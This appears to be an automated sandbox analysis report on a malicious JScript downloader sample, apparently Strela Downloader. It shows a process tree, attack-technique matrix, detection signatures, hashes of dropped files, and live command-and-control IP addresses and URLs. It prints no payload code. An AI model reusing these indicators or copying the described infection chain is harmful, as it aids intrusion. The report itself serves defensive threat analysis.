    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    Application Window Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync122
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591694 Sample: 31070304561863532281.js Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 38 x1.i.lencr.org 2->38 50 Suricata IDS alerts for network traffic 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Sigma detected: Powershell launch regsvr32 2->54 56 6 other signatures 2->56 10 wscript.exe 1 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 60 JScript performs obfuscated calls to suspicious functions 10->60 62 Wscript starts Powershell (via cmd or directly) 10->62 64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->64 66 3 other signatures 10->66 16 cmd.exe 3 2 10->16         started        42 127.0.0.1 unknown unknown 13->42 signatures6 process7 signatures8 44 Suspicious powershell command line found 16->44 46 Wscript starts Powershell (via cmd or directly) 16->46 48 Gathers information about network shares 16->48 19 powershell.exe 14 16 16->19         started        23 cmd.exe 1 16->23         started        26 Acrobat.exe 80 16->26         started        28 conhost.exe 16->28         started        process9 dnsIp10 40 193.143.1.205, 49730, 49731, 80 BITWEB-ASRU unknown 19->40 36 C:\Users\user\AppData\Local\...\invoice.pdf, PDF 19->36 dropped 58 Gathers information about network shares 23->58 30 net.exe 1 23->30         started        32 AcroCEF.exe 107 26->32         started        file11 signatures12 process13 process14 34 AcroCEF.exe 2 32->34         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    31070304561863532281.js12%VirustotalBrowse
    31070304561863532281.js8%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://193.143.1.205:8888/jes0%Avira URL Cloudsafe
    http://193.143.1.205:8888/2e;0%Avira URL Cloudsafe
    http://193.143.1.205:8888/6e?0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      high
      x1.i.lencr.org
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://193.143.1.205/invoice.phpfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://193.143.1.205:8888/temnet.exe, 00000006.00000002.1755505171.0000028369AE8000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://g.live.com/odclientsettings/Prod.C:edb.log.8.drfalse
              high
              http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.7.drfalse
                high
                https://g.live.com/odclientsettings/ProdV2.C:edb.log.8.drfalse
                  high
                  http://193.143.1.205:8888/2e;net.exe, 00000006.00000003.1754675080.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B1F000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://g.live.com/odclientsettings/ProdV2edb.log.8.drfalse
                    high
                    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000008.00000003.1754665179.000001E9796C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.drfalse
                      high
                      http://193.143.1.205:8888/net.exe, 00000006.00000003.1754675080.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755505171.0000028369AE8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000003.1753601412.0000028369B3C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B3E000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://193.143.1.205:8888/6e?net.exe, 00000006.00000003.1754675080.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B1F000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000008.00000003.1754665179.000001E9796C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drfalse
                          high
                          http://193.143.1.205:8888/jesnet.exe, 00000006.00000003.1754675080.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B1F000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          193.143.1.205
                          unknownunknown
                          57271BITWEB-ASRUtrue
                          IP
                          127.0.0.1
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1591694
                          Start date and time:2025-01-15 10:08:08 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 58s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:16
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:31070304561863532281.js
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.expl.evad.winJS@27/57@1/2
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .js
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 2.23.240.205, 2.16.168.105, 2.16.168.107, 50.16.47.176, 54.224.241.105, 18.213.11.84, 34.237.241.83, 162.159.61.3, 172.64.41.3, 2.23.242.162, 199.232.210.172, 23.209.209.135, 2.16.168.125, 4.175.87.197, 96.17.64.171, 20.109.210.53, 13.107.246.45
                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          TimeTypeDescription
                          04:09:04API Interceptor21x Sleep call for process: powershell.exe modified
                          04:09:07API Interceptor1x Sleep call for process: net.exe modified
                          04:09:07API Interceptor2x Sleep call for process: svchost.exe modified
                          04:09:20API Interceptor2x Sleep call for process: AcroCEF.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          193.143.1.2052387315401298627745.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          1475127682155276.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          14957144702878221204.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          1579614525244583223.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          35491083472324549.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          28236151432955330765.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          17201670993971103.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          2330118683179179335.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          577119676170175151.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          106714464113327088.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205:8888/
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          bg.microsoft.map.fastly.netInquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                          • 199.232.214.172
                          new.batGet hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          2387315401298627745.jsGet hashmaliciousStrela DownloaderBrowse
                          • 199.232.214.172
                          92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                          • 199.232.210.172
                          1475127682155276.jsGet hashmaliciousStrela DownloaderBrowse
                          • 199.232.210.172
                          Invdoc80.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 199.232.210.172
                          Reversed order 24-25.pdfGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          wmnq39xe8J.dllGet hashmaliciousWannacryBrowse
                          • 199.232.214.172
                          Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 199.232.210.172
                          tTbeoLWNhb.dllGet hashmaliciousWannacryBrowse
                          • 199.232.214.172
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          BITWEB-ASRU1724730880967915900.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          2387315401298627745.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          8886101892955431603.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          1475127682155276.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          14957144702878221204.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          1579614525244583223.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          35491083472324549.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          28236151432955330765.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          17201670993971103.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          2330118683179179335.jsGet hashmaliciousStrela DownloaderBrowse
                          • 193.143.1.205
                          No context
                          No context
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):1.3073453145837404
                          Encrypted:false
                          SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrp:KooCEYhgYEL0In
                          MD5:541DBC37B7DC5AAD9F54D59F288C59CC
                          SHA1:C4F72D3DF5F6DBE71EA195466AFA75FD961B3582
                          SHA-256:3B904FDB76B19D47BE94921FB166E23DCF235DC4B8CC79014257263C10FE92E3
                          SHA-512:5798E9CF85F7BC6B978C8F4413793783139CEA1D65447AAA13AC646803791ED84FD4D8030D899881156E40804C40AFD4ED02CA39CCC17194FBB32147CF77068A
                          Malicious:false
                          Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\svchost.exe
                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x86a47625, page size 16384, DirtyShutdown, Windows version 10.0
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.42213241418078973
                          Encrypted:false
                          SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                          MD5:B62D62BEBFC0973D8E0DF721AF70444A
                          SHA1:D778FE251710206980891F81F9DD162BC8D7BBFA
                          SHA-256:95EF8AEB1849E06BF7CAE19FD8B498F0AD44FE4F0AC3590BBB148A5365152A63
                          SHA-512:DFCD61A8CB0576A7DC73EB2D696E2605C40F86D17CA00B115B4E6D053E2DA6E4DB29F9B30081FA28CA71293034C2A36C83275DF0BCFAF03219C1F9B306243675
                          Malicious:false
                          Preview:..v%... .......A.......X\...;...{......................0.!..........{A......}7.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................]......}U.................}........}7..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.07681582808039306
                          Encrypted:false
                          SSDEEP:3:pUYeVsbjjn13a/8cssw8YllcVO/lnlZMxZNQl:pUzVsbj53q8uoOewk
                          MD5:F0652228D45D025CB25C02C1FF8D7E0A
                          SHA1:1E4413598F0C947E64E0C130B8CF2D1120018372
                          SHA-256:82A295191AEA113F6C1699322282C6AD5D492E382CED2CDFADA47B9DCEA9292C
                          SHA-512:1A7E5896655857901507C4C5C5D40CCA589B68573EF58653B3EDE102F75F55F4E682F7F6B4AA49CEBBD39B6CF9D9EADF2E39F674BBF302070B912AB6A5B522D3
                          Malicious:false
                          Preview:N........................................;...{.......}7......{A..............{A......{A..........{A]................}........}7.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):292
                          Entropy (8bit):5.183970582516538
                          Encrypted:false
                          SSDEEP:6:iOuh12COq2Pwkn2nKuAl9OmbnIFUt4h1hZmwih17kwOwkn2nKuAl9OmbjLJ:7yOvYfHAahFUtG/Y5JfHAaSJ
                          MD5:E006C0101FEE0C3BA5F993E484F96C4C
                          SHA1:107EC8190894A76B8762A23C7DC6CCB955F98E9F
                          SHA-256:F3EE21C5A465DEB2A84376CADDA293B3AD07F8AC4C661EDD32C768A73076ECA6
                          SHA-512:F168576A80045E5F5DE93EE6BD138249608B1FBEF8510E83243B533C34A940162408476977C21412938CA216E812792CBFC8400B59778BB0DF7891F3EBE30FD9
                          Malicious:false
                          Preview:2025/01/15-04:09:07.465 1ec0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/15-04:09:07.467 1ec0 Recovering log #3.2025/01/15-04:09:07.467 1ec0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):292
                          Entropy (8bit):5.183970582516538
                          Encrypted:false
                          SSDEEP:6:iOuh12COq2Pwkn2nKuAl9OmbnIFUt4h1hZmwih17kwOwkn2nKuAl9OmbjLJ:7yOvYfHAahFUtG/Y5JfHAaSJ
                          MD5:E006C0101FEE0C3BA5F993E484F96C4C
                          SHA1:107EC8190894A76B8762A23C7DC6CCB955F98E9F
                          SHA-256:F3EE21C5A465DEB2A84376CADDA293B3AD07F8AC4C661EDD32C768A73076ECA6
                          SHA-512:F168576A80045E5F5DE93EE6BD138249608B1FBEF8510E83243B533C34A940162408476977C21412938CA216E812792CBFC8400B59778BB0DF7891F3EBE30FD9
                          Malicious:false
                          Preview:2025/01/15-04:09:07.465 1ec0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/15-04:09:07.467 1ec0 Recovering log #3.2025/01/15-04:09:07.467 1ec0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):336
                          Entropy (8bit):5.172345079304627
                          Encrypted:false
                          SSDEEP:6:iOuh5+q2Pwkn2nKuAl9Ombzo2jMGIFUt4h3MBZmwih3MVVkwOwkn2nKuAl9Ombzz:7m+vYfHAa8uFUtQMB/qMVV5JfHAa8RJ
                          MD5:E71DFD116ACF34DB2E6B0FB189B21229
                          SHA1:F322AB4356FF31C5CBC96CD9764C9B77BADB2E2E
                          SHA-256:36453896D0B6E089005F187688C8995408E9C198D18284EEC45625AAA0082DA2
                          SHA-512:91F06774CF8550E177200E021E60998928B027FA9DFF61F173121CC9CD84A14E819AF34151393FD0F9106AE8330DEBB1637E1E6E88723DA1D5CEEA01A2037C92
                          Malicious:false
                          Preview:2025/01/15-04:09:07.506 1f7c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/15-04:09:07.507 1f7c Recovering log #3.2025/01/15-04:09:07.507 1f7c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):336
                          Entropy (8bit):5.172345079304627
                          Encrypted:false
                          SSDEEP:6:iOuh5+q2Pwkn2nKuAl9Ombzo2jMGIFUt4h3MBZmwih3MVVkwOwkn2nKuAl9Ombzz:7m+vYfHAa8uFUtQMB/qMVV5JfHAa8RJ
                          MD5:E71DFD116ACF34DB2E6B0FB189B21229
                          SHA1:F322AB4356FF31C5CBC96CD9764C9B77BADB2E2E
                          SHA-256:36453896D0B6E089005F187688C8995408E9C198D18284EEC45625AAA0082DA2
                          SHA-512:91F06774CF8550E177200E021E60998928B027FA9DFF61F173121CC9CD84A14E819AF34151393FD0F9106AE8330DEBB1637E1E6E88723DA1D5CEEA01A2037C92
                          Malicious:false
                          Preview:2025/01/15-04:09:07.506 1f7c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/15-04:09:07.507 1f7c Recovering log #3.2025/01/15-04:09:07.507 1f7c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):475
                          Entropy (8bit):4.964782568416978
                          Encrypted:false
                          SSDEEP:12:YH/um3RA8sqIVBPxsBdOg2Hf0Acaq3QYiubInP7E4T3y:Y2sRdsZVBadMH23QYhbG7nby
                          MD5:012809A8ED5CAB751E7CF77EDB37B736
                          SHA1:BB23B5E3348298B6CBDEF00905A422451EC308A7
                          SHA-256:7CF4768549139E7976796FEF5DF423F616F925E2C95D121EC90891814B278F83
                          SHA-512:A271C404E9594E81F3DF3CD81B636F9981BBEBA1C91E2C96F71725BFB10DBB2F1404A05B6ABF4423641F6948A02CDC9151330D6D64BC60DC007A6992D7B5BF09
                          Malicious:false
                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381492160305172","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":125412},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:modified
                          Size (bytes):475
                          Entropy (8bit):4.964782568416978
                          Encrypted:false
                          SSDEEP:12:YH/um3RA8sqIVBPxsBdOg2Hf0Acaq3QYiubInP7E4T3y:Y2sRdsZVBadMH23QYhbG7nby
                          MD5:012809A8ED5CAB751E7CF77EDB37B736
                          SHA1:BB23B5E3348298B6CBDEF00905A422451EC308A7
                          SHA-256:7CF4768549139E7976796FEF5DF423F616F925E2C95D121EC90891814B278F83
                          SHA-512:A271C404E9594E81F3DF3CD81B636F9981BBEBA1C91E2C96F71725BFB10DBB2F1404A05B6ABF4423641F6948A02CDC9151330D6D64BC60DC007A6992D7B5BF09
                          Malicious:false
                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381492160305172","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":125412},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4320
                          Entropy (8bit):5.251871511226335
                          Encrypted:false
                          SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7WASiHI:etJCV4FiN/jTN/2r8Mta02fEhgO73goW
                          MD5:1D4EFB70F1E28B5789FC20B275F14C88
                          SHA1:32A09C9FFCBE4079BDBB48E1B340455B6750754C
                          SHA-256:69948790D876C178BD369FA25F21CD9F2C3DBF03A679735CFDEF9DCE36227CAF
                          SHA-512:A0DAD74581F2BE12C30267382C15882302886AC3D5E0D32C03B13572C96BA880676A3F5457B1A25B63B986720B045207C76D3BC4BF04DAB58932337EE17CF69F
                          Malicious:false
                          Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):324
                          Entropy (8bit):5.214569702698778
                          Encrypted:false
                          SSDEEP:6:iOuhO+q2Pwkn2nKuAl9OmbzNMxIFUt4hwIZZmwihAVkwOwkn2nKuAl9OmbzNMFLJ:7F+vYfHAa8jFUt6/bV5JfHAa84J
                          MD5:143DF5F38F64E147AC33424C7A4D1826
                          SHA1:3DA27ACEAFCA5B6C781EED15B0F3ED9E6148B3A8
                          SHA-256:6EA3C440C31B287C513F2A803D8B69D76FAEF9660EB6E5A81007F80637D68AC7
                          SHA-512:C28E5C7F2AA21C5523A54B6E922D4E354392B40D2DF54DD290FC162334DE45F99FBD15155B9526D1B5D36D610D16E8B1AE280C8F20231014E77F557B3043FC43
                          Malicious:false
                          Preview:2025/01/15-04:09:07.617 1f7c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/15-04:09:07.618 1f7c Recovering log #3.2025/01/15-04:09:07.619 1f7c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):324
                          Entropy (8bit):5.214569702698778
                          Encrypted:false
                          SSDEEP:6:iOuhO+q2Pwkn2nKuAl9OmbzNMxIFUt4hwIZZmwihAVkwOwkn2nKuAl9OmbzNMFLJ:7F+vYfHAa8jFUt6/bV5JfHAa84J
                          MD5:143DF5F38F64E147AC33424C7A4D1826
                          SHA1:3DA27ACEAFCA5B6C781EED15B0F3ED9E6148B3A8
                          SHA-256:6EA3C440C31B287C513F2A803D8B69D76FAEF9660EB6E5A81007F80637D68AC7
                          SHA-512:C28E5C7F2AA21C5523A54B6E922D4E354392B40D2DF54DD290FC162334DE45F99FBD15155B9526D1B5D36D610D16E8B1AE280C8F20231014E77F557B3043FC43
                          Malicious:false
                          Preview:2025/01/15-04:09:07.617 1f7c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/15-04:09:07.618 1f7c Recovering log #3.2025/01/15-04:09:07.619 1f7c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                          Category:dropped
                          Size (bytes):86016
                          Entropy (8bit):4.444879830719372
                          Encrypted:false
                          SSDEEP:384:yezci5toiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rPs3OazzU89UTTgUL
                          MD5:CAFF56D8E96A962439592B881D768187
                          SHA1:0B5DDC6C3DE9840CFBC81E6E63730161909B97D6
                          SHA-256:DA6CD03E3B8B7D5F9421511D5DCB3138998818B2A4493A1436A21130AE15032D
                          SHA-512:70EF69EEAFC755BB134BDB8C562D8213BF9E18AAD402BCE2E9B698186D255DB1F3964718C4119110BECF85509A7AB00D1023414C9FFD96BABBBE52BE7B6A4040
                          Malicious:false
                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):8720
                          Entropy (8bit):3.7771963822438743
                          Encrypted:false
                          SSDEEP:48:7M2p/E2ioyVwioy9oWoy1Cwoy10KOioy1noy1AYoy1Wioy1hioybioyKoy1noy1F:7lpjuwFnXKQ7Vb9IVXEBodRBkv
                          MD5:CFD5E4FD20C75AB9274ED47EFE85092C
                          SHA1:6D62B70E92CF36712AA2792DCA3AD8DDE531B34F
                          SHA-256:5819714A768FDC7A5F83715834EDEE510429CA7BC9C63D174ACAF78BF1DBDDFA
                          SHA-512:3D7B26F438EA2326E83C6B8414E11248804D99AFF7A53C8319E7714499A3F104D0770C33AA50E9E47F3C08D994BE75F48CFCE04F34994B3005F45BAEEA2B2DCA
                          Malicious:false
                          Preview:.... .c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Certificate, Version=3
                          Category:dropped
                          Size (bytes):1391
                          Entropy (8bit):7.705940075877404
                          Encrypted:false
                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
